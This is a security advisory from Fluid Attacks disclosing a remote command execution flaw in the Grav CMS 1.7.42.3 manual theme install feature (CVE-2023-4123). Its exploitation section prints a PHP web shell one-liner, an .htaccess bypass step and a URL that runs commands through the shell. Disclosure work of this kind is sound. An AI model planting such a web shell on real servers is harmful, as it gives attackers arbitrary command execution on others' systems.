grav 1.7.42.3 - Remote Command Execution

Summary

Namegrav 1.7.42.3 - Remote Command Execution
Code name
Productgrav 1.7.42.3
Affected versionsVersion 1.7.42.3
StatePrivate
Release date2023-08-11

Vulnerability

KindRemote Command Execution
Rule
RemoteYes
CVSSv3.1 VectorCVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H/E:H/RL:U/RC:C
CVSSv3.1 Base Score8.0
Exploit availableYes
CVE ID(s)

Description

grav allows an user to execute commands on the server by abusing the manual install themes functionality

Vulnerability

A Remote Command Execution (RCE) vulnerability has been identified in grav, a admin user or a user with Super User privilegies can upload manual themes, this functionality does not check the integrity of the packages or perform any other type of validation on the uploaded themes, with this flaw we can add a php shell we also need to add a default .htaccess file to bypass the default configuration that prevents the execution of php files in the themes folder in the folder.

poc

Exploitation

In the Portal of grav , we need to go to Tools -> Direct Install and Upload our theme with the payload:

<?php $cmd=$_GET['cmd']; system($cmd); ?>

poc1

after that, we need to visit the theme path with our shell

server/user/themes/material-lite/images/poc.php?cmd=whoami

poc2

Our security policy

We have reserved the ID CVE-2023-4123 to refer to this issue from now on.

System Information

  • Version: grav 1.7.42.3

  • Operating System: Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Ronald Hernandez from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/getgrav/grav

Timeline

Time-lapse-logo

2023-07-26

Vulnerability discovered.

Time-lapse-logo

2023-07-26

Vendor contacted.

Time-lapse-logo

2023-08-11

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.